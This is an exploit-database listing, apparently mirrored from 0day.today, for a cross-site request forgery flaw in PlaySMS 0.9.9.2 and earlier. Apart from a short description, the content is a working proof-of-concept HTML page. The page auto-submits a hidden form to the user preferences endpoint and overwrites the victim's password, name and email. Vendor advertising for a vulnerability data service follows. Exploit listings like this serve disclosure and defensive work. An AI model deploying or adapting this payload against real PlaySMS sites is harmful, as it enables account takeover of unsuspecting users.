Lucene search
+L

PlaySMS <= 0.9.9.2 - CSRF Vulnerability

🗓️ 11 Dec 2013 00:00:00Reported by Saadi SiddiquiType 
zdt
 zdt
🔗 0day.today👁 23 Views

PlaySMS CSRF vulnerability allows attacker to manipulate user data and change password

Code
Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
 
Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:
 
<html>
 <body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
 
         
            <input type=hidden size=30 maxlength=30 name=up_password value="admin">
         
            <input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
         
            <input type=hidden size=30 maxlength=100 name=up_name value="admin">
         
     
            <input type=hidden size=30 maxlength=30 name=up_email value="[email protected]">
 
 
 
            <td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
     
            <td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
 
            <td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
         
             
            <td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>
     
 
<input type=submit class=button value='Save'> 
</form>
</html>

#  0day.today [2018-02-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2013 00:00Current
7.1High risk
Vulners AI Score7.1
23